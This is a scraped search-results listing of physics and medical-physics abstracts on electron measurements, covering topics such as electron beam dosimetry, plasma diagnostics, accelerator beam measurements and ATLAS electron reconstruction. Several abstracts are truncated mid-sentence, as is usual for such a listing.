Pencil Beam algorithm XiO CMS scheduler uses the applicator factor, instead of blocking factor in the calculation of monitor units (MU) shaped electron fields. This feature makes the algorithm for calculating an input field the same dose in the beam axis than it would if it were not blocked. It should, therefore, to correct the UM that provides the planner by a factor. The blocks used in electron treatment of the surgical mamma cancers often have a narrow elongated shape following the contour of the scar. Such openings have difficulty measuring the blocking factor with plane-parallel chambers recommended by national and international protocols (eg PTW Roos 34 001) as being so narrow that sometimes the camera is not completely irradiated. In this paper, we study the possibility of using a PTW 30010 Farmer cylindrical chamber for measuring the blocking factor of such openings. 10. Fast-electron-relaxation measurement for laser-solid interaction at relativistic laser intensities International Nuclear Information System (INIS) Chen, H.; Shepherd, R.; Chung, H. K.; Kemp, A.; Hansen, S. B.; Wilks, S. C.; Ping, Y.; Widmann, K.; Fournier, K. B.; Beiersdorfer, P.; Dyer, G.; Faenov, A.; Pikuz, T. 2007-01-01 We present measurements of the fast-electron-relaxation time in short-pulse (0.5 ps) laser-solid interactions for laser intensities of 10 17 , 10 18 , and 10 19 W/cm 2 , using a picosecond time-resolved x-ray spectrometer and a time-integrated electron spectrometer. We find that the laser coupling to hot electrons increases as the laser intensity becomes relativistic, and that the thermalization of fast electrons occurs over time scales on the order of 10 ps at all laser intensities. The experimental data are analyzed using a combination of models that include Kα generation, collisional coupling, and plasma expansion 11. Application of Coherent Tune Shift Measurements to the Characterization of Electron Cloud Growth International Nuclear Information System (INIS) Kreinick, D.L.; Crittenden, J.A.; Dugan, G.; Holtzapple, R.L.; Randazzo, M.; Furman, M.A.; Venturini, M.; Palmer, M.A.; Ramirez, G. 2011-01-01 Measurements of coherent tune shifts at the Cornell Electron Storage Ring Test Accelerator (CesrTA) have been made for electron and positron beams under a wide variety of beam energies, bunch charge, and bunch train configurations. Comparing the observed tunes with the predictions of several electron cloud simulation programs allows the evaluation of important parameters in these models. These simulations will be used to predict the behavior of the electron cloud in damping rings for future linear colliders. We outline recent improvements to the analysis techniques that should improve the fidelity of the modeling. 12. Measurement of turbulent electron temperature fluctuations on the ASDEX Upgrade tokamak using correlated electron cyclotron emission Energy Technology Data Exchange (ETDEWEB) Freethy, S. J., E-mail: [email protected] [Max Planck Institute for Plasma Physics, 85748 Garching (Germany); Plasma Science and Fusion Center, Massachusetts Institute of Technology, Cambridge, Massachusetts 02139 (United States); Conway, G. D.; Happel, T.; Köhn, A. [Max Planck Institute for Plasma Physics, 85748 Garching (Germany); Classen, I.; Vanovac, B. [FOM Institute DIFFER, 5612 AJ Eindhoven (Netherlands); Creely, A. J.; White, A. E. [Plasma Science and Fusion Center, Massachusetts Institute of Technology, Cambridge, Massachusetts 02139 (United States) 2016-11-15 Turbulent temperature fluctuations are measured on the ASDEX Upgrade tokamak using pairs of closely spaced, narrow-band heterodyne radiometer channels and a standard correlation technique. The pre-detection spacing and bandwidth of the radiometer channel pairs is chosen such that they are physically separated less than a turbulent correlation length, but do not overlap. The radiometer has 4 fixed filter frequency channels and two tunable filter channels for added flexibility in the measurement position. Relative temperature fluctuation amplitudes are observed in a helium plasma to be δT/T = (0.76 ± 0.02)%, (0.67 ± 0.02)%, and (0.59 ± 0.03)% at normalised toroidal flux radius of ρ{sub tor} = 0.82, 0.75, and 0.68, respectively. 13. Spectroscopic measurements of the density and electronic temperature at the plasma edge in Tore Supra International Nuclear Information System (INIS) Lediankine, A. 1996-01-01 The profiles of temperature and electronic density at the plasma edge are important to study the wall-plasma interaction and the radiative layers in the Tokamak plasmas. The laser ablation technique of the lithium allows to measure the profile of electronic density. To measure the profile of temperature, it has been used for the first time, the injection of a fluorine neutral atoms beam. The experiments, the results are described in this work. (N.C.) 14. Beam Spot Measurement on a 400 keV Electron Accelerator DEFF Research Database (Denmark) Miller, Arne 1979-01-01 A line probe is used to measure the beam spot radius and beam divergence at a 400 keV ICT electron accelerator, and a method is shown for reducing the line probe data in order to get the radial function.......A line probe is used to measure the beam spot radius and beam divergence at a 400 keV ICT electron accelerator, and a method is shown for reducing the line probe data in order to get the radial function.... 15. A Novel Electronic Device for Measuring Urine Flow Rate: A Clinical Investigation OpenAIRE Aliza Goldman; Hagar Azran; Tal Stern; Mor Grinstein; Dafna Wilner 2017-01-01 Objective: Currently, most vital signs in the intensive care unit (ICU) are electronically monitored. However, clinical practice for urine output (UO) measurement, an important vital sign, usually requires manual recording of data that is subject to human errors. In this study, we assessed the ability of a novel electronic UO monitoring device to measure real-time hourly UO versus current clinical practice. Design: Patients were connected to the RenalSense Clarity RMS Sensor Kit with a sensor... 16. Simultaneous Measurements of Substorm-Related Electron Energization in the Ionosphere and the Plasma Sheet Science.gov (United States) Sivadas, N.; Semeter, J.; Nishimura, Y.; Kero, A. 2017-10-01 On 26 March 2008, simultaneous measurements of a large substorm were made using the Poker Flat Incoherent Scatter Radar, Time History of Events and Macroscale Interactions during Substorm (THEMIS) spacecraft, and all sky cameras. After the onset, electron precipitation reached energies ≳100 keV leading to intense D region ionization. Identifying the source of energetic precipitation has been a challenge because of lack of quantitative and magnetically conjugate measurements of loss cone electrons. In this study, we use the maximum entropy inversion technique to invert altitude profiles of ionization measured by the radar to estimate the loss cone energy spectra of primary electrons. By comparing them with magnetically conjugate measurements from THEMIS-D spacecraft in the nightside plasma sheet, we constrain the source location and acceleration mechanism of precipitating electrons of different energy ranges. Our analysis suggests that the observed electrons ≳100 keV are a result of pitch angle scattering of electrons originating from or tailward of the inner plasma sheet at 9RE, possibly through interaction with electromagnetic ion cyclotron waves. The electrons of energy 10-100 keV are produced by pitch angle scattering due to a potential drop of ≲10 kV in the auroral acceleration region (AAR) as well as wave-particle interactions in and tailward of the AAR. This work demonstrates the utility of magnetically conjugate ground- and space-based measurements in constraining the source of energetic electron precipitation. Unlike in situ spacecraft measurements, ground-based incoherent scatter radars combined with an appropriate inversion technique can be used to provide remote and continuous-time estimates of loss cone electrons in the plasma sheet. 17. Ion Flux Measurements in Electron Beam Produced Plasmas in Atomic and Molecular Gases Science.gov (United States) Walton, S. G.; Leonhardt, D.; Blackwell, D. D.; Murphy, D. P.; Fernsler, R. F.; Meger, R. A. 2001-10-01 In this presentation, mass- and time-resolved measurements of ion fluxes sampled from pulsed, electron beam-generated plasmas will be discussed. Previous works have shown that energetic electron beams are efficient at producing high-density plasmas (10^10-10^12 cm-3) with low electron temperatures (Te < 1.0 eV) over the volume of the beam. Outside the beam, the plasma density and electron temperature vary due, in part, to ion-neutral and electron-ion interactions. In molecular gases, electron-ion recombination plays a significant role while in atomic gases, ion-neutral interactions are important. These interactions also determine the temporal variations in the electron temperature and plasma density when the electron beam is pulsed. Temporally resolved ion flux and energy distributions at a grounded electrode surface located adjacent to pulsed plasmas in pure Ar, N_2, O_2, and their mixtures are discussed. Measurements are presented as a function of operating pressure, mixture ratio, and electron beam-electrode separation. The differences in the results for atomic and molecular gases will also be discussed and related to their respective gas-phase kinetics. 18. A measurement of electron-wall interactions using transmission diffraction from nanofabricated gratings International Nuclear Information System (INIS) Barwick, Brett; Gronniger, Glen; Yuan, Lu; Liou, Sy-Hwang; Batelaan, Herman 2006-01-01 Electron diffraction from metal coated freestanding nanofabricated gratings is presented, with a quantitative path integral analysis of the electron-grating interactions. Electron diffraction out to the 20th order was observed indicating the high quality of our nanofabricated gratings. The electron beam is collimated to its diffraction limit with ion-milled material slits. Our path integral analysis is first tested against single slit electron diffraction, and then further expanded with the same theoretical approach to describe grating diffraction. Rotation of the grating with respect to the incident electron beam varies the effective distance between the electron and grating bars. This allows the measurement of the image charge potential between the electron and the grating bars. Image charge potentials that were about 15% of the value for that of a pure electron-metal wall interaction were found. We varied the electron energy from 50 to 900 eV. The interaction time is of the order of typical metal image charge response times and in principle allows the investigation of image charge formation. In addition to the image charge interaction there is a dephasing process reducing the transverse coherence length of the electron wave. The dephasing process causes broadening of the diffraction peaks and is consistent with a model that ascribes the dephasing process to microscopic contact potentials. Surface structures with length scales of about 200 nm observed with a scanning tunneling microscope, and dephasing interaction strength typical of contact potentials of 0.35 eV support this claim. Such a dephasing model motivated the investigation of different metallic coatings, in particular Ni, Ti, Al, and different thickness Au-Pd coatings. Improved quality of diffraction patterns was found for Ni. This coating made electron diffraction possible at energies as low as 50 eV. This energy was limited by our electron gun design. These results are particularly relevant for the 19. Three-dimensional space charge distribution measurement in electron beam irradiated PMMA International Nuclear Information System (INIS) Imaizumi, Yoichi; Suzuki, Ken; Tanaka, Yasuhiro; Takada, Tatsuo 1996-01-01 The localized space charge distribution in electron beam irradiated PMMA was investigated using pulsed electroacoustic method. Using a conventional space charge measurement system, the distribution only in the depth direction (Z) can be measured assuming the charges distributed uniformly in the horizontal (X-Y) plane. However, it is difficult to measure the distribution of space charge accumulated in small area. Therefore, we have developed the new system to measure the three-dimensional space charge distribution using pulsed electroacoustic method. The system has a small electrode with a diameter of 1mm and a motor-drive X-Y stage to move the sample. Using the data measured at many points, the three-dimensional distribution were obtained. To estimate the system performance, the electron beam irradiated PMMA was used. The electron beam was irradiated from transmission electron microscope (TEM). The depth of injected electron was controlled using the various metal masks. The measurement results were compared with theoretically calculated values of electron range. (author) 20. Electron cloud density measurements in accelerator beam-pipe using resonant microwave excitation Energy Technology Data Exchange (ETDEWEB) Sikora, John P., E-mail: [email protected] [CLASSE, Cornell University, Ithaca, NY 14853 (United States); Carlson, Benjamin T. [Carnegie Mellon University, Pittsburgh, PA 15213 (United States); Duggins, Danielle O. [Gordon College, Wenham, MA 01984 (United States); Hammond, Kenneth C. [Columbia University, New York, NY 10027 (United States); De Santis, Stefano [LBNL, Berkeley, CA 94720 (United States); Tencate, Alister J. [Idaho State University, Pocatello, ID 83209 (United States) 2014-08-01 An accelerator beam can generate low energy electrons in the beam-pipe, generally called electron cloud, that can produce instabilities in a positively charged beam. One method of measuring the electron cloud density is by coupling microwaves into and out of the beam-pipe and observing the response of the microwaves to the presence of the electron cloud. In the original technique, microwaves are transmitted through a section of beam-pipe and a change in EC density produces a change in the phase of the transmitted signal. This paper describes a variation on this technique in which the beam-pipe is resonantly excited with microwaves and the electron cloud density calculated from the change that it produces in the resonant frequency of the beam-pipe. The resonant technique has the advantage that measurements can be localized to sections of beam-pipe that are a meter or less in length with a greatly improved signal to noise ratio. 1. Absorption and backscatter of internal conversion electrons in the measurements of surface contamination of 137Cs International Nuclear Information System (INIS) Yunoki, A.; Kawada, Y.; Yamada, T.; Unno, Y.; Sato, Y.; Hino, Y. 2013-01-01 We measured 4π and 2π counting efficiencies for internal conversion electrons (ICEs), gross β-particles and also β-rays alone with various source conditions regarding absorber and backing foil thickness using e-X coincidence technique. Dominant differences regarding the penetration, attenuation and backscattering properties among ICEs and β-rays were revealed. Although the abundance of internal conversion electrons of 137 Cs- 137 Ba is only 9.35%, 60% of gross counts may be attributed to ICEs in worse source conditions. This information will be useful for radionuclide metrology and for surface contamination monitoring. - Highlights: • Counting efficiencies for internal conversion electrons from 137 Cs were measured, and compared with those for β-rays. • Electron-X coincidence technique was employed. • A thin NaI(Tl) scintillation detector was used for X-ray detection. • Backscattering fractions of electrons and beta particles were studied by similar experiments 2. Unique electron polarimeter analyzing power comparison and precision spin-based energy measurement International Nuclear Information System (INIS) Joseph Grames; Charles Sinclair; Joseph Mitchell; Eugene Chudakov; Howard Fenker; Arne Freyberger; Douglas Higinbotham; Poelker, B.; Michael Steigerwald; Michael Tiefenback; Christian Cavata; Stephanie Escoffier; Frederic Marie; Thierry Pussieux; Pascal Vernin; Samuel Danagoulian; Kahanawita Dharmawardane; Renee Fatemi; Kyungseon Joo; Markus Zeier; Viktor Gorbenko; Rakhsha Nasseripour; Brian Raue; Riad Suleiman; Benedikt Zihlmann 2004-01-01 Precision measurements of the relative analyzing powers of five electron beam polarimeters, based on Compton, Moller, and Mott scattering, have been performed using the CEBAF accelerator at the Thomas Jefferson National Accelerator Facility (Jefferson Laboratory). A Wien filter in the 100 keV beamline of the injector was used to vary the electron spin orientation exiting the injector. High statistical precision measurements of the scattering asymmetry as a function of the spin orientation were made with each polarimeter. Since each polarimeter receives beam with the same magnitude of polarization, these asymmetry measurements permit a high statistical precision comparison of the relative analyzing powers of the five polarimeters. This is the first time a precise comparison of the analyzing powers of Compton, Moller, and Mott scattering polarimeters has been made. Statistically significant disagreements among the values of the beam polarization calculated from the asymmetry measurements made with each polarimeter reveal either errors in the values of the analyzing power, or failure to correctly include all systematic effects. The measurements reported here represent a first step toward understanding the systematic effects of these electron polarimeters. Such studies are necessary to realize high absolute accuracy (ca. 1%) electron polarization measurements, as required for some parity violation measurements planned at Jefferson Laboratory. Finally, a comparison of the value of the spin orientation exiting the injector that provides maximum longitudinal polarization in each experimental hall leads to an independent and very precise (better than 10-4) absolute measurement of the final electron beam energy 3. CO2 laser interferometer for temporally and spatially resolved electron density measurements Science.gov (United States) Brannon, P. J.; Gerber, R. A.; Gerardo, J. B. 1982-09-01 A 10.6-μm Mach-Zehnder interferometer has been constructed to make temporally and spatially resolved measurements of electron densities in plasmas. The device uses a pyroelectric vidicon camera and video memory to record and display the two-dimensional fringe pattern and a Pockels cell to limit the pulse width of the 10.6-μm radiation. A temporal resolution of 14 ns has been demonstrated. The relative sensitivity of the device for electron density measurements is 2×1015 cm-2 (the line integral of the line-of-sight length and electron density), which corresponds to 0.1 fringe shift. 4. CO2 laser interferometer for temporally and spatially resolved electron density measurements International Nuclear Information System (INIS) Brannon, P.J.; Gerber, R.A.; Gerardo, J.B. 1982-01-01 A 10.6-μm Mach--Zehnder interferometer has been constructed to make temporally and spatially resolved measurements of electron densities in plasmas. The device uses a pyroelectric vidicon camera and video memory to record and display the two-dimensional fringe pattern and a Pockels cell to limit the pulse width of the 10.6-μm radiation. A temporal resolution of 14 ns has been demonstrated. The relative sensitivity of the device for electron density measurements is 2 x 10 15 cm -2 (the line integral of the line-of-sight length and electron density), which corresponds to 0.1 fringe shift 5. Accurate measurement of the electron beam polarization in JLab Hall A using Compton polarimetry International Nuclear Information System (INIS) Escoffier, S.; Bertin, P.Y.; Brossard, M.; Burtin, E.; Cavata, C.; Colombel, N.; Jager, C.W. de; Delbart, A.; Lhuillier, D.; Marie, F.; Mitchell, J.; Neyret, D.; Pussieux, T. 2005-01-01 A major advance in accurate electron beam polarization measurement has been achieved at Jlab Hall A with a Compton polarimeter based on a Fabry-Perot cavity photon beam amplifier. At an electron energy of 4.6GeV and a beam current of 40μA, a total relative uncertainty of 1.5% is typically achieved within 40min of data taking. Under the same conditions monitoring of the polarization is accurate at a level of 1%. These unprecedented results make Compton polarimetry an essential tool for modern parity-violation experiments, which require very accurate electron beam polarization measurements 6. Measurement of optically and thermally stimulated electron emission from natural minerals DEFF Research Database (Denmark) Ankjærgaard, C.; Murray, A.S.; Denby, P.M. 2006-01-01 to a Riso TL/OSL reader, enabling optically stimulated electrons (OSE) and thermally stimulated electrons (TSE) to be measured simultaneously with optically stimulated luminescence (OSL) and thermoluminescence (TL). Repeated irradiation and measurement is possible without removing the sample from...... the counting chamber. Using this equipment both OSE and TSE from loose sand-sized grains of natural minerals has been recorded. It is shown that both the surface electron traps (giving rise to the OSE signals) and the bulk traps (giving rise to OSL) have the same dosimetric properties. A comparison of OSL... 7. Calorimetry for absorbed dose measurement at 1-4 MeV electron accelerators International Nuclear Information System (INIS) Miller, A. 2000-01-01 Calorimeters are used for dose measurement, calibration and intercomparisons at industrial electron accelerators, and their use at 10 MeV electron accelerators is well documented. The work under this research agreement concerns development of calorimeters for use at electron accelerators with energies in the range of 2-4 MeV. The dose range of the calorimeters is 3-40 kGy, and their temperature stability after irradiation was found to be sufficient for practical use in an industrial environment. Measurement uncertainties were determined to be 5% at k = 2. (author) 8. Faraday cup for electron flux measurements on the microtron MT 25 International Nuclear Information System (INIS) Vognar, M.; Simane, C.; Chvatil, D. 2001-01-01 The basic design criteria for construction of an evacuated Faraday cup for precise measurement of 5-25 MeV electron beam currents in air from a microtron are characterized. The homemade Faraday cup is described along with the electronic chain and its incorporation into the measuring beam line. The provisions applied to reduce backward electron escape are outlined. The current range was 10 -5 to 10 -10 A. The diameter of the Al entrance window of the Faraday cup was 1.8 cm, its area was 2.54 cm 2 and thickness 0.1 mm 9. Electron temperature measurement in Maxwellian non-isothermal beam plasma of an ion thruster International Nuclear Information System (INIS) Zhang, Zun; Tang, Haibin; Kong, Mengdi; Zhang, Zhe; Ren, Junxue 2015-01-01 Published electron temperature profiles of the beam plasma from ion thrusters reveal many divergences both in magnitude and radial variation. In order to know exactly the radial distributions of electron temperature and understand the beam plasma characteristics, we applied five different experimental approaches to measure the spatial profiles of electron temperature and compared the agreement and disagreement of the electron temperature profiles obtained from these techniques. Experimental results show that the triple Langmuir probe and adiabatic poly-tropic law methods could provide more accurate space-resolved electron temperature of the beam plasma than other techniques. Radial electron temperature profiles indicate that the electrons in the beam plasma are non-isothermal, which is supported by a radial decrease (∼2 eV) of electron temperature as the plume plasma expands outward. Therefore, the adiabatic “poly-tropic law” is more appropriate than the isothermal “barometric law” to be used in electron temperature calculations. Moreover, the calculation results show that the electron temperature profiles derived from the “poly-tropic law” are in better agreement with the experimental data when the specific heat ratio (γ) lies in the range of 1.2-1.4 instead of 5/3 10. Measurement of electron emission due to energetic ion bombardment in plasma source ion implantation Science.gov (United States) Shamim, M. M.; Scheuer, J. T.; Fetherston, R. P.; Conrad, J. R. 1991-11-01 An experimental procedure has been developed to measure electron emission due to energetic ion bombardment during plasma source ion implantation. Spherical targets of copper, stainless steel, graphite, titanium alloy, and aluminum alloy were biased negatively to 20, 30, and 40 kV in argon and nitrogen plasmas. A Langmuir probe was used to detect the propagating sheath edge and a Rogowski transformer was used to measure the current to the target. The measurements of electron emission coefficients compare well with those measured under similar conditions. 11. Thermal neutron flux measurements using neutron-electron converters; Mesure de flux de neutrons thermiques avec des convertisseurs neutrons electrons Energy Technology Data Exchange (ETDEWEB) Le Meur, R; Lecomte, P [Commissariat a l' Energie Atomique, Saclay (France). Centre d' Etudes Nucleaires 1968-07-01 The operation of neutron-electron converters designed for measuring thermal neutron fluxes is examined. The principle is to produce short lived isotopes emitting beta particles, by activation, and to measure their activity not by extracting them from the reactor, but directly in the reactor using the emitted electrons to deflect the needle of a galvanometer placed outside the flux. After a theoretical study, the results of the measurements are presented; particular attention is paid to a new type of converter characterized by a layer structure. The converters are very useful for obtaining flux distributions with more than 10{sup 7} neutrons cm{sup -2}*sec{sup -1}. They work satisfactorily in pressurized carbon dioxide at 400 Celsius degrees. Some points still have to be cleared up however concerning interfering currents in the detectors and the behaviour of the dielectrics under irradiation. (authors) [French] On examine le fonctionnement de convertisseurs neutrons electrons destines a des mesures de flux de neutrons thermiques. Le principe est de former par activation des isotopes a periodes courtes et a emission beta et de mesurer leur activite non pas en les sortant du reacteur, mais directement en pile, utilisant les electrons emis pour faire devier l'aiguille d'un galvanometre place hors flux. Apres une etude theorique, on indique des resultats de mesures obtenus, en insistant particulierement sur un nouveau type de convertisseur, caracterise par sa structure stratifiee. Les convertisseurs sont tres interessants pour tracer, des cartes de flux a partir de 10{sup 7} neutrons cm{sup -2}*s{sup -1}. Ils sont utilisables pour des flux de 10{sup 14} neutrons cm{sup -2}*s{sup -1}. Ils fonctionnent correctement dans du gaz carbonique sous pression a 400 C. Des points restent cependant a eclaircir concernant les courants parasites dans les detecteurs et le comportement des dielectriques pendant leur irradiation. (auteur) 12. In situ measurements and transmission electron microscopy of carbon nanotube field-effect transistors International Nuclear Information System (INIS) Kim, Taekyung; Kim, Seongwon; Olson, Eric; Zuo Jianmin 2008-01-01 We present the design and operation of a transmission electron microscopy (TEM)-compatible carbon nanotube (CNT) field-effect transistor (FET). The device is configured with microfabricated slits, which allows direct observation of CNTs in a FET using TEM and measurement of electrical transport while inside the TEM. As demonstrations of the device architecture, two examples are presented. The first example is an in situ electrical transport measurement of a bundle of carbon nanotubes. The second example is a study of electron beam radiation effect on CNT bundles using a 200 keV electron beam. In situ electrical transport measurement during the beam irradiation shows a signature of wall- or tube-breakdown. Stepwise current drops were observed when a high intensity electron beam was used to cut individual CNT bundles in a device with multiple bundles 13. Fluctuations of the electron temperature measured by intensity interferometry on the W7-AS stellarator International Nuclear Information System (INIS) Sattler, S. 1993-12-01 Fluctuations of the electron temperature can cause a significant amount of the anomalous electron heat conductivity observed on fusion plasmas, even with relative amplitudes below one per cent. None of the standard diagnostics utilized for measuring the electron temperature in the confinement region of fusion plasmas is provided with sufficient spatial and temporal resolution and the sensitivity for small fluctuation amplitudes. In this work a new diagnostic for the measurement of electron temperature fluctuations in the confinement region of fusion plasmas was developed, built up, tested and successfully applied on the W7-AS Stellarator. Transport relevant fluctuations of the electron temperature can in principle be measured by radiometry of the electron cyclotron emission (ECE), but they might be buried completely in natural fluctuations of the ECE due to the thermal nature of this radiation. Fluctuations with relative amplitudes below one per cent can be measured with a temporal resolution in the μs-range and a spatial resolution of a few cm only with the help of correlation techniques. The intensity interferometry method, developed for radio astronomy, was applied here: two independent but identical radiometers are viewing the same emitting volume along crossed lines of sight. If the angle between the sightlines is chosen above a limiting value, which is determined by the spatial coherence properties of thermal radiation, the thermal noise is uncorrelated while the temperature fluctuations remain correlated. With the help of this technique relative amplitudes below 0.1% are accessible to measurement. (orig.) 14. Lead Halide Perovskites as Charge Generation Layers for Electron Mobility Measurement in Organic Semiconductors. Science.gov (United States) Love, John A; Feuerstein, Markus; Wolff, Christian M; Facchetti, Antonio; Neher, Dieter 2017-12-06 Hybrid lead halide perovskites are introduced as charge generation layers (CGLs) for the accurate determination of electron mobilities in thin organic semiconductors. Such hybrid perovskites have become a widely studied photovoltaic material in their own right, for their high efficiencies, ease of processing from solution, strong absorption, and efficient photogeneration of charge. Time-of-flight (ToF) measurements on bilayer samples consisting of the perovskite CGL and an organic semiconductor layer of different thickness are shown to be determined by the carrier motion through the organic material, consistent with the much higher charge carrier mobility in the perovskite. Together with the efficient photon-to-electron conversion in the perovskite, this high mobility imbalance enables electron-only mobility measurement on relatively thin application-relevant organic films, which would not be possible with traditional ToF measurements. This architecture enables electron-selective mobility measurements in single components as well as bulk-heterojunction films as demonstrated in the prototypical polymer/fullerene blends. To further demonstrate the potential of this approach, electron mobilities were measured as a function of electric field and temperature in an only 127 nm thick layer of a prototypical electron-transporting perylene diimide-based polymer, and found to be consistent with an exponential trap distribution of ca. 60 meV. Our study furthermore highlights the importance of high mobility charge transporting layers when designing perovskite solar cells. 15. Electron precipitation control of the Mars nightside ionosphere Science.gov (United States) Lillis, R. J.; Girazian, Z.; Mitchell, D. L.; Adams, D.; Xu, S.; Benna, M.; Elrod, M. K.; Larson, D. E.; McFadden, J. P.; Andersson, L.; Fowler, C. M. 2017-12-01 The nightside ionosphere of Mars is known to be highly variable, with densities varying substantially with ion species, solar zenith angle, solar wind conditions and geographic location. The factors that control its structure include neutral densities, day-night plasma transport, plasma temperatures, dynamo current systems driven by neutral winds, solar energetic particle events, superthermal electron precipitation, chemical reaction rates and the strength, geometry and topology of crustal magnetic fields. The MAVEN mission has been the first to systematically sample the nightside ionosphere by species, showing that shorter-lived species such as CO2+ and O+ are more correlated with electron precipitation flux than longer lived species such as O2+ and NO+, as would be expected, and is shown in the figure below from Girazian et al. [2017, under review at Geophysical Research Letters]. In this study we use electron pitch-angle and energy spectra from the Solar Wind Electron Analyzer (SWEA) and Solar Energetic Particle (SEP) instruments, ion and neutral densities from the Neutral Gas and Ion Mass Spectrometer (NGIMS), electron densities and temperatures from the Langmuir Probe and Waves (LPW) instrument, as well as electron-neutral ionization cross-sections. We present a comprehensive statistical study of electron precipitation on the Martian nightside and its effect on the vertical, local-time and geographic structure and composition of the ionosphere, over three years of MAVEN observations. We also calculate insitu electron impact ionization rates and compare with ion densities to judge the applicability of photochemical models of the formation and maintenance of the nightside ionosphere. Lastly, we show how this applicability varies with altitude and is affected by ion transport measured by the Suprathermal and thermal Ion Composition (STATIC) instrument. 16. Electron efficiency measurements with the ATLAS detector using 2012 LHC proton-proton collision data Energy Technology Data Exchange (ETDEWEB) Aaboud, M. [Univ. Mohamed Premier et LPTPM, Oujda (Morocco). Faculte des Sciences; Aad, G. [CPPM, Aix-Marseille Univ. et CNRS/IN2P3, Marseille (France); Abbott, B. [Oklahoma Univ., Norman, OK (United States). Homer L. Dodge Dept. of Physics and Astronomy; Collaboration: ATLAS Collaboration; and others 2017-03-15 This paper describes the algorithms for the reconstruction and identification of electrons in the central region of the ATLAS detector at the Large Hadron Collider (LHC). These algorithms were used for all ATLAS results with electrons in the final state that are based on the 2012 pp collision data produced by the LHC at √(s) = 8 TeV. The efficiency of these algorithms, together with the charge misidentification rate, is measured in data and evaluated in simulated samples using electrons from Z → ee, Z → eeγ and J/ψ → ee decays. For these efficiency measurements, the full recorded data set, corresponding to an integrated luminosity of 20.3 fb{sup -1}, is used. Based on a new reconstruction algorithm used in 2012, the electron reconstruction efficiency is 97% for electrons with E{sub T} = 15 GeV and 99% at E{sub T} = 50 GeV. Combining this with the efficiency of additional selection criteria to reject electrons from background processes or misidentified hadrons, the efficiency to reconstruct and identify electrons at the ATLAS experiment varies from 65 to 95%, depending on the transverse momentum of the electron and background rejection. (orig.) 17. Measurement and production of electron deflection using a sweeping magnetic device in radiotherapy International Nuclear Information System (INIS) Damrongkijudom, N.; Oborn, B.; Rosenfeld, A.; Butson, M. 2006-01-01 The deflection and removal of high energy electrons produced by a medical linear accelerator has been attained by a Neodymium Iron Boron (NdFeB) permanent magnetic deflector device. This work was performed in an attempt to confirm the theoretical amount of electron deflection which could be produced by a magnetic field for removal of electrons from a clinical x-ray beam. This was performed by monitoring the paths of mostly monoenergetic clinical electron beams (6MeV to 20MeV) swept by the magnetic fields using radiographic film and comparing to first order deflection models. Results show that the measured deflection distance for 6 MeV electrons was 18 ± 6 cm and the calculated deflection distance was 21.3 cm. For 20 MeV electrons, this value was 5 ± 2 cm for measurement and 5.1 cm for calculation. The magnetic fields produced can thus reduce surface dose in treatment regions of a patient under irradiation by photon beams and we can predict the removal of all electron contaminations up to 6 MeV from a 6 MV photon beam with the radiation field size up to 10 x 10 cm 2 . The model can also estimate electron contamination still present in the treatment beam at larger field sizes 18. Energetic electron measurements in the edge of a reversed-field pinch International Nuclear Information System (INIS) Ingraham, J.C.; Ellis, R.F.; Downing, J.N.; Munson, C.P.; Weber, P.G.; Wurden, G.A. 1990-01-01 The edge plasma of the ZT-40M [Fusion Technol. 8, 1571 (1985)] reversed-field pinch has been studied using a combination of three different plasma probes: a double-swept Langmuir probe, an electrostatic energy analyzer, and a calorimeter--Langmuir probe. The edge plasma has been measured both with and without a movable graphite tile limiter present nearby in the plasma. Without a limiter a fast nonthermal tail of electrons (T congruent 350 eV) is detected in the edge plasma with nearly unidirectional flow along B and having a density between 2% and 10% of the cold edge plasma (T congruent 20 eV). The toroidal sense of this fast electron flow is against the force of the applied electric field. A large power flux along B is measured flowing in the same direction as the fast electrons and is apparently carried by the fast electrons. With the limiter present the fast electrons are still detected in the plasma, but are strongly attenuated in the shadow of the limiter. The measured scrape-off lengths for both the fast electrons and the cold plasma indicate cross-field transport at the rate of, or less than, Bohm diffusion. Estimates indicate that the fast electrons could carry the reversed-field pinch current density at the edge and, from the measured transverse diffusion rates, could also account for the electron energy loss channel in ZT-40 M. The long mean-free-path kinetic nature of these fast electrons suggests that a kinetic process, rather than a magnetohydrodynamic process that is based upon a local Ohm's law formulation, is responsible for their generation 19. Experimental system to measure excitation cross-sections by electron impact. Measurements for ArI and ArII International Nuclear Information System (INIS) Blanco, F.; Sanchez, J.A.; Aguilera, J.A.; Campos, J. 1989-01-01 An experimental set-up to measure excitation cross-section of atomic and molecular levels by electron impact based on the optical method is reported. We also present some measurements on the excitation cross-section for ArI 5p'(1/2)0 level, and for simultaneous ionization and excitation of Ar leading to ArII levels belonging to the 3p 4 4p and 3p 4 4d configurations. (Author) 20. Generation and Beaming of Early Hot Electrons onto the Capsule in Laser-Driven Ignition Hohlraums Science.gov (United States) Dewald, E. L.; Hartemann, F.; Michel, P.; Milovich, J.; Hohenberger, M.; Pak, A.; Landen, O. L.; Divol, L.; Robey, H. F.; Hurricane, O. A.; Döppner, T.; Albert, F.; Bachmann, B.; Meezan, N. B.; MacKinnon, A. J.; Callahan, D.; Edwards, M. J. 2016-02-01 In hohlraums for inertial confinement fusion (ICF) implosions on the National Ignition Facility, suprathermal hot electrons, generated by laser plasma instabilities early in the laser pulse ("picket") while blowing down the laser entrance hole (LEH) windows, can preheat the capsule fuel. Hard x-ray imaging of a Bi capsule surrogate and of the hohlraum emissions, in conjunction with the measurement of time-resolved bremsstrahlung spectra, allows us to uncover for the first time the directionality of these hot electrons and infer the capsule preheat. Data and Monte Carlo calculations indicate that for most experiments the hot electrons are emitted nearly isotropically from the LEH. However, we have found cases where a significant fraction of the generated electrons are emitted in a collimated beam directly towards the capsule poles, where their local energy deposition is up to 10 × higher than the average preheat value and acceptable levels for ICF implosions. The observed "beaming" is consistent with a recently unveiled multibeam stimulated Raman scattering model [P. Michel et al., Phys. Rev. Lett. 115, 055003 (2015)], where laser beams in a cone drive a common plasma wave on axis. Finally, we demonstrate that we can control the amount of generated hot electrons by changing the laser pulse shape and hohlraum plasma. 1. Measurement of the magnetic interaction between two bound electrons of two separate ions. Science.gov (United States) Kotler, Shlomi; Akerman, Nitzan; Navon, Nir; Glickman, Yinnon; Ozeri, Roee 2014-06-19 Electrons have an intrinsic, indivisible, magnetic dipole aligned with their internal angular momentum (spin). The magnetic interaction between two electronic spins can therefore impose a change in their orientation. Similar dipolar magnetic interactions exist between other spin systems and have been studied experimentally. Examples include the interaction between an electron and its nucleus and the interaction between several multi-electron spin complexes. The challenge in observing such interactions for two electrons is twofold. First, at the atomic scale, where the coupling is relatively large, it is often dominated by the much larger Coulomb exchange counterpart. Second, on scales that are substantially larger than the atomic, the magnetic coupling is very weak and can be well 